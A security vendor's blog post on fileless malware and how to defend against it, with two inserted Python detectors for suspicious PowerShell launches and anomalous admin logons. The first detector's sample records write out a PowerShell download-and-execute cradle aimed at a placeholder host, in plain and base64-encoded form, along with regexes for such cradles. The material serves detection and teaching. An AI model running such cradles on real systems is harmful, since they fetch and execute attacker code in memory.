Effective URL: https://pratum.com/blog/515-what-are-fileless-malware-attacks?utm_medium=email&_hsmi=190245315&_hsenc=p2ANqtz-9_RpD...
PRATUM BLOG


WHAT ARE FILELESS MALWARE ATTACKS?

Written by Trevor Meers | Category: Blog | Created: 17 September 2021

Every ransomware update you’ll hear right now includes discussion of a growing
threat that goes by multiple names. Fileless malware. Living-off-the-land
attacks. Memory-based attacks. Non-malware attacks.

Whatever you call it, the fileless malware threat is growing and extremely
evasive—but you can mount a meaningful defense. In this blog, we talk with
Pratum Senior Penetration Tester Jason Moulder about the growing issue of
fileless malware attacks, how they work and how you can create an effective
defense against this slippery enemy.





FILELESS MALWARE BASICS

Fileless malware attacks give almost no sign of entry and leave almost no
evidence in their wake. If a data breach were a physical burglary, a fileless
malware attack would look something like arriving at your office to find the
company’s secret formula missing from the vault. Yet there’s no sign of a broken
lock, overturned furniture or even a footprint in the carpet. The bad guys seem
to have materialized in the vault and evaporated with the goods just as
mysteriously. The reality, however, is that they somehow convinced one of your
trusted employees to steal the formula using their approved access to the vault.

In the same way, fileless malware operates without writing a foreign executable
to disk. It runs inside legitimate, trusted tools that ship with the operating
system (especially Windows PowerShell) and turns them against you. That makes it
extremely hard to detect with traditional antivirus software, which works by
matching files on disk against known signatures.

This technique has been surging lately: fileless malware attacks jumped 900% in
2020, according to one report. Another study found that 74% of malware detected
in Q1 2021 was classified as "zero-day," a category that report uses for any
sample that does not yet show up in the databases of signature-scanning tools.





HOW FILELESS MALWARE WORKS

Because these attacks use the scripting engines already present in your
legitimate software, they're a bit like a digital cancer, with hackers turning
the system's own elements against it. With no new file installed, antivirus
programs usually can't see them. And because fileless malware abuses trusted
applications or the operating system itself, blocklisting apps you consider
dangerous won't do any good: the binaries being abused are the ones you already
trust, so application allowlisting has to be paired with visibility into how
those trusted tools are used (process-creation and PowerShell script block
logging, at a minimum). The most common vector in fileless attacks is a script
run through Windows PowerShell, which accounts for up to 90% of fileless attacks
in some studies. Hackers also frequently leverage Windows Remote Management
(WinRM) to run commands on other machines.

Pratum Senior Penetration Tester Jason Moulder, who spends his days getting
inside hackers' minds, calls fileless malware one of the most elusive threats in
play. "If you were to scan all the communication between all the APIs in your
system every day, you're looking at an incredible amount of data. If you look at
your Task Manager, you'll see certain elements running 50 times simultaneously
because they're used by multiple programs. That's what makes fileless malware
such a great attack avenue. The malicious activity gets lost inside the normal
activities that make your operating system function."

Digital forensics investigations struggle to reconstruct how these attacks
happened because the malicious script lives only in memory and is gone once the
system restarts. That is why responders should capture volatile memory (and any
PowerShell, Sysmon or EDR telemetry) from a suspect host before powering it off.

Hackers also like this form of attack because the script runs with whatever
privileges the user who launched the trusted tool already has. When that user is
an administrator, the attacker inherits admin access to the endpoint and can use
it as a gateway to the rest of the network.





COMMON FILELESS MALWARE CARRIERS

The security community has identified scores of binaries, scripts and libraries
that hackers use in fileless attacks. (You can browse a list here.) Here are
some of the most common ways that hackers get a foot in the door for these
attacks:

Web scripts – Hackers often launch malicious scripts through JavaScript, a
staple of web page design. (Hackers also relied heavily on the Adobe Flash
plugin until Adobe ended support at the end of 2020 and blocked Flash content
from running in January 2021.) Hackers lure users into clicking a link in an
e-mail that takes them to a website that looks legit but is set up to
fingerprint the browser for exploitable weaknesses and slip malicious code into
the system. That means, as usual, that social engineering is a critical
vulnerability you need to shut down through better user training.

PDFs – The issue with this ubiquitous file type typically revolves around PDFs
that carry embedded scripts. When a reader, or a browser that opens PDFs by
default, runs those scripts, the document becomes a launcher for the kind of
in-memory stage that hackers blend into legitimate processes. "For
example," Jason says, "you can write something for PowerShell that says, 'When
you open this, open this command in the background and go get this file from the
Internet.' Whenever it goes to this website, that site can load something into
memory."

Microsoft Office macros – Similarly, Office macros run code that gives hackers
a chance to piggyback with their own malicious scripts. In response, Office now
disables macros by default and shows a warning bar instead of running them. But
Jason warns, "You can still trick people into enabling the macro. It may require
some limited user action to initiate it, especially if it's a Word doc or a PDF.
When they click it to open it, that part is written to disk and can be seen in
forensics. But once it's loaded into memory, that's where it can get lost pretty
quickly."
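The PowerShell vector described under "How fileless malware works" and the
download cradle Jason describes for PDFs and macros can both be caught at the
process-creation boundary, before the payload is lost in memory. The following
is an added example, not code from the original post or from Pratum: it checks
constructed process-creation records, decodes any -EncodedCommand payload, and
flags a document handler spawning a script host together with the switches and
cmdlets typical of an in-memory download cradle. Field names follow Sysmon
Event ID 1 / Windows Event 4688, and every path, account and URL in the sample
records is an assumption made for illustration.

```python
"""Flag fileless-style abuse of trusted script hosts in process-creation records.

Added example, not Pratum's tooling. The records are constructed to resemble
the fields of Sysmon Event ID 1 / Windows Security Event 4688 (Image,
ParentImage, CommandLine); every path, host and payload below is an
assumption for illustration only.
"""
import base64
import binascii
import re

# Trusted script hosts that fileless attacks ride on (living-off-the-land binaries).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Document handlers (Office, PDF readers) that should almost never spawn a script host.
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                 "acrord32.exe", "acrobat.exe"}

# Command-line tokens typical of in-memory download cradles and AV-evasion switches.
TOKEN_PATTERNS = {
    "invoke-expression": r"\b(?:iex|invoke-expression)\b",
    "web-download": r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|invoke-restmethod",
    "hidden-window": r"-w(?:indowstyle)?\s+hidden",
    "no-profile": r"-nop(?:rofile)?\b",
    "policy-bypass": r"-e(?:p|x|xec|xecutionpolicy)\s+bypass",
    "reflective-load": r"reflection\.assembly|frombase64string",
}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encoded(?:command)?)\b\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(command_line):
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None."""
    match = ENC_RE.search(command_line)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def suspicious_tokens(text):
    """Names of the TOKEN_PATTERNS that occur in `text` (case-insensitive), sorted."""
    lowered = text.lower()
    return sorted(name for name, pattern in TOKEN_PATTERNS.items() if re.search(pattern, lowered))


def analyze(record):
    """Reasons a single process-creation record looks like fileless abuse ([] if none)."""
    image = record["Image"].rsplit("\\", 1)[-1].lower()
    parent = record["ParentImage"].rsplit("\\", 1)[-1].lower()
    command = record["CommandLine"]
    reasons = []
    if parent in DOCUMENT_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"document handler {parent} spawned script host {image}")
    decoded = decode_encoded_command(command)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    # Match against the visible command line AND the decoded payload, so the
    # cradle is caught even when only its base64 form appears in the log.
    tokens = suspicious_tokens(command + " " + (decoded or ""))
    if tokens:
        reasons.append("suspicious tokens: " + ", ".join(tokens))
    return reasons


def scan(records):
    """(Id, reasons) for every record that produced at least one reason."""
    results = []
    for record in records:
        reasons = analyze(record)
        if reasons:
            results.append((record["Id"], reasons))
    return results


# Constructed sample records; the URL is a placeholder, not a real stager.
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/stage.ps1')"
ENCODED_CRADLE = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_RECORDS = [
    {"Id": "1", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_PATH,
     "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"Id": "2", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": PS_PATH, "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED_CRADLE}"},
    {"Id": "3", "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS_PATH,
     "CommandLine": 'powershell.exe -ep bypass -c "Invoke-WebRequest http://example.test/a.txt -OutFile a.txt"'},
]

if __name__ == "__main__":
    for record_id, reasons in scan(SAMPLE_RECORDS):
        print(record_id, "->", "; ".join(reasons))
```

Run as-is and records 2 and 3 are reported while the scheduled backup in
record 1 is not. The decoded payload is scored alongside the raw command line
on purpose: an analyst eyeballing the log sees only base64, which is exactly
where the malicious activity "gets lost" as Jason puts it.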





HOW YOU CAN PROTECT YOURSELF

Security leaders engage in a daily arms race with hackers as each side counters
new moves by the other. While fileless malware presents a serious threat, you
can actively defend against it with the following steps.

Implement managed XDR – A managed XDR service like Pratum’s provides complete
monitoring across your entire system through SIEM, endpoint detection and
response and 24/7 SOC analysts interpreting the alerts that come in. Managed XDR
spots suspicious activity and correlates signals to form a picture of a
developing threat, even when it’s caused by something other than a known
malicious file.

Jason points to the following indicators that XDR can pick up as the sign of a
brewing fileless malware attack:

 * Numerous queries against Active Directory related to user and domain
   enumeration. That could give away an attacker preparing to pivot by exploring
   what access they have.
 * Legitimate activities chained together in unusual ways. “If someone
   initialized a connection and then tried to impersonate an administrator or
   grab a Kerberos ticket, that’s not something that should happen,” Jason says.
 * Suspicious authentication activity. If your monitoring solution sees NTLM
   authentication where Kerberos is expected, or an NTLM hash being passed in
   place of a password (pass-the-hash), that is worth a look. It may mean
   someone scraped the hash from memory and doesn't know the real password.
 * Multiple admin logins from the same person or logins outside of normal hours.
 * Unapproved versions. If you prefer a particular version of PsExec, for
   example, allowlist only that version's hash in your system. That makes it
   easy to spot someone running a build whose hash doesn't match.





Limit user access – Many fileless malware attacks target users with wide-ranging
network access, using compromised credentials to pivot throughout the system. By
limiting users to only the data they really need (as described here), you can
limit hackers’ ability to move laterally if they get in.

Jason calls specific attention to admin accounts. “Using the default admin built
into Windows is a very bad habit because once you have that account, you can go
pretty much anywhere,” he says.
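Several of the indicators Jason lists for XDR (off-hours and multi-host admin
logons, NTLM where Kerberos is expected, unapproved PsExec builds) and his
point about the built-in Administrator account can be expressed as simple
correlation rules over logon events. The following is an added example, not
Pratum's XDR logic: it runs those rules over constructed Event 4624-style
records and checks a binary against a hash allowlist. The business hours,
thresholds, account names, SIDs and addresses are all assumptions.

```python
"""Correlate Windows logon events for the fileless-attack indicators above.

Added example, not Pratum's XDR logic. The events are constructed to resemble
fields of Windows Security Event 4624 (TargetUserName, TargetUserSid,
IpAddress, AuthenticationPackageName, TimeCreated); the account names,
addresses, thresholds and business hours below are assumptions.
"""
import hashlib
from collections import defaultdict
from datetime import datetime, timedelta

BUSINESS_HOURS = range(7, 19)                   # 07:00-18:59 local; adjust per site
ADMIN_ACCOUNTS = {"it-admin", "Administrator"}  # privileged accounts to watch
FANOUT_LIMIT = 3                                # distinct sources per admin per window
WINDOW = timedelta(minutes=10)


def off_hours_admin_logons(events):
    """Admin logons outside business hours."""
    return [e for e in events
            if e["user"] in ADMIN_ACCOUNTS and e["time"].hour not in BUSINESS_HOURS]


def admin_fanout(events, limit=FANOUT_LIMIT, window=WINDOW):
    """Admin accounts seen from more than `limit` distinct sources inside one window:
    one person logging in everywhere at once is the shape of lateral movement."""
    by_user = defaultdict(list)
    for e in events:
        if e["user"] in ADMIN_ACCOUNTS:
            by_user[e["user"]].append(e)
    flagged = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["time"])
        for i, start in enumerate(evs):
            sources = {e["src"] for e in evs[i:] if e["time"] - start["time"] <= window}
            if len(sources) > limit:
                flagged[user] = sorted(sources)
                break
    return flagged


def ntlm_admin_logons(events):
    """Admin logons authenticated with NTLM rather than Kerberos. Where admins
    normally hold Kerberos tickets this is a heuristic for pass-the-hash, not
    proof of it; check the source host and logon type before acting."""
    return [e for e in events
            if e["user"] in ADMIN_ACCOUNTS and e["auth"].upper() == "NTLM"]


def builtin_admin_logons(events):
    """Use of the built-in Administrator: RID 500 identifies it whatever it is renamed to."""
    return [e for e in events if e["sid"].endswith("-500")]


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def is_approved_binary(data, approved_hashes):
    """Allowlist by hash so a different build of PsExec (or a renamed copy) stands out."""
    return sha256_hex(data) in approved_hashes


def report(events):
    """Flat list of (indicator, user, detail) findings."""
    findings = [("off-hours-admin-logon", e["user"], e["src"]) for e in off_hours_admin_logons(events)]
    findings += [("admin-logon-fanout", u, ",".join(s)) for u, s in admin_fanout(events).items()]
    findings += [("ntlm-auth-for-admin", e["user"], e["src"]) for e in ntlm_admin_logons(events)]
    findings += [("builtin-administrator-used", e["user"], e["sid"]) for e in builtin_admin_logons(events)]
    return findings


def event(hh_mm, user, sid, src, auth):
    """Build one constructed 4624-style event on a fixed sample day."""
    hour, minute = map(int, hh_mm.split(":"))
    return {"time": datetime(2021, 9, 17, hour, minute), "user": user,
            "sid": sid, "src": src, "auth": auth}


DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID
SAMPLE_EVENTS = [
    event("09:00", "it-admin", DOMAIN + "-1105", "10.0.0.5", "Kerberos"),
    event("14:00", "jdoe", DOMAIN + "-1203", "10.0.0.30", "Kerberos"),
    event("02:13", "it-admin", DOMAIN + "-1105", "10.0.0.5", "Kerberos"),
    event("02:14", "it-admin", DOMAIN + "-1105", "10.0.0.21", "NTLM"),
    event("02:16", "it-admin", DOMAIN + "-1105", "10.0.0.22", "NTLM"),
    event("02:18", "it-admin", DOMAIN + "-1105", "10.0.0.23", "NTLM"),
    event("02:20", "it-admin", DOMAIN + "-1105", "10.0.0.24", "NTLM"),
    event("10:00", "Administrator", DOMAIN + "-500", "10.0.0.9", "Kerberos"),
]
APPROVED_PSEXEC = b"constructed stand-in for the approved PsExec.exe bytes"
APPROVED_HASHES = {sha256_hex(APPROVED_PSEXEC)}

if __name__ == "__main__":
    for finding in report(SAMPLE_EVENTS):
        print(*finding)
    print("tampered copy approved:", is_approved_binary(APPROVED_PSEXEC + b"\x90", APPROVED_HASHES))
```

The sample deliberately chains the indicators the way a real intrusion does:
the same admin account appears at 2 a.m., from five hosts in ten minutes, over
NTLM. Each rule alone is noisy; the value is in seeing them fire together.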

Train employees – This advice never goes out of style. Teaching employees to
recognize and avoid suspicious links will greatly reduce your risk by preventing
malicious scripts from ever getting the chance to scan a device and go to work.



For advice about how you can protect your specific system from the
ever-changing fileless malware threat, contact Pratum today.

© 2021 - Pratum, Inc. All Rights Reserved